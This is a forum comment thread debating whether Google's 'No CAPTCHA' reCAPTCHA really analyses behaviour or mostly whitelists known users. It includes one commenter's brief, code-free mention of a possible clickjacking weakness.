Seriously guys? This made to the top of the front page?
First of all, to all people saying "HUR DUR GOOGLE WANTS YOUR BROWSING DATA", well they already fucking have/had it for a looong time.
Secondly, If you tell me that one dude [author] ruled the one+ year work of the engineering team at google as a flaw and simplified it as [So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved.] and that you believe it, I would question your intelligence.
This is supposed to be tech savvy community at least to some degree, what the fuck.
Now, in the google's blogpost it reads [Advanced Risk Analysis backend for reCAPTCHA that actively considers a user’s entire engagement with the CAPTCHA—before, during, and after—to determine whether that user is a human.]
[However, CAPTCHAs aren't going away just yet. In cases when the risk analysis engine can't confidently predict whether a user is a human or an abusive agent, it will prompt a CAPTCHA to elicit more cues, increasing the number of security checkpoints to confirm the user is valid.]
So my guess would be they analyze users behaviour on the page where captcha is located, things like mouse movements, time it takes to type out the words, spelling mistakes corrected and whatever else humans do differently than bots - and only then combine that with your historical cookies. Maybe it is much more complicated than that, I, as well as you, don't know the details.
Do you really think that they would go ahead and implement a such system without rigorous testing of effectiveness? I am sure that they tested it extensively with users, AND with bots, and decided that it is better than the current system, and ONLY then deployed it.
Rant off.
>So my guess would be they analyze users behaviour on the page where captcha is located, things like mouse movements
If they can track mouse movements why in incognito mode i'm not a human for them anymore? I was expecting same but from what I see it's just a whitelist. And it's OK. Problem is, which you probably didn't care to read, is it's vulnerable to simple clickjacking which opens another weakness - i can use your click on my page to get your reCAPTCHA token and feed it to my spam bot.
I'm actually happy with No CAPTCHA, because it's making progress. But it's not good enough (see the rest of comments, it could be a background AJAX request instead).
So what do you think about clickjacking issue? I made an assumption about their algo and maybe I'm wrong and they do track your mouse, but there's exploitable weakness. My post is 1) your algo seems simple 2) here's a bug in it.
The curious thing is, I could not replicate the clickjacking issue. Everytime I make a click on original wordpress registration page, I am verified as a human immediately.
If I do the click on your github page, I get a challenge. My clicks were never accepted as human on your github page. My clicks were always accepted as human on wordpress page.
Since you obviously don't know who Homakov is I can't take your post very seriously.
Homakov has exposed several serious security flaws at Facebook and Google before. I'm pretty sure Google is actively trying to headhunt him since he is one of the best in the web security field.
He's probably best known to HN for his GitHub exploit with Rails in 2012. I wrote a profile of him earlier this year (http://jobtipsforgeeks.com/2014/03/27/homakov/) which talks about his background a bit more.
> Do you really think that they would go ahead and implement a such system without rigorous testing of effectiveness? I am sure that they tested it extensively with users, AND with bots, and decided that it is better than the current system, and ONLY then deployed it.
I think the gap between the marketing material for nocaptcha (a simplified website, a youtube video with animations) and the seemingly lacking actual implementation is why this blog post was relevant for me.
Like other tech people around here, I was hyped up by the "smarts" of a system that uses cursor detection etc. to silently validate that I am a human. This blog post seems to indicate that the validation is a much simpler issue of previously passed tests and the amount of data that Google has associated with the user.
That's exactly why I wrote this post. I wish Google proved me wrong and demonstrate us how they use cool tech to detect bots instead of user.isGoogleUser? and user.acceptedCaptchas > 5
>>>So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved.
That is a bold statement, something presented as a fact, not a hypothesis.
The google's blogpost says that 98 something percent of old text could be deciphered by AI. My point is, regardless of vulnerabilities of the new system, I am certain that it is more effective than the old alternative. They would have tested it.
Secondly, If you tell me that one dude [author] ruled the one+ year work of the engineering team at google as a flaw and simplified it as [So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved.] and that you believe it, I would question your intelligence.
This is supposed to be tech savvy community at least to some degree, what the fuck.
Now, in the google's blogpost it reads [Advanced Risk Analysis backend for reCAPTCHA that actively considers a user’s entire engagement with the CAPTCHA—before, during, and after—to determine whether that user is a human.]
[However, CAPTCHAs aren't going away just yet. In cases when the risk analysis engine can't confidently predict whether a user is a human or an abusive agent, it will prompt a CAPTCHA to elicit more cues, increasing the number of security checkpoints to confirm the user is valid.]
So my guess would be they analyze users behaviour on the page where captcha is located, things like mouse movements, time it takes to type out the words, spelling mistakes corrected and whatever else humans do differently than bots - and only then combine that with your historical cookies. Maybe it is much more complicated than that, I, as well as you, don't know the details.
Do you really think that they would go ahead and implement a such system without rigorous testing of effectiveness? I am sure that they tested it extensively with users, AND with bots, and decided that it is better than the current system, and ONLY then deployed it. Rant off.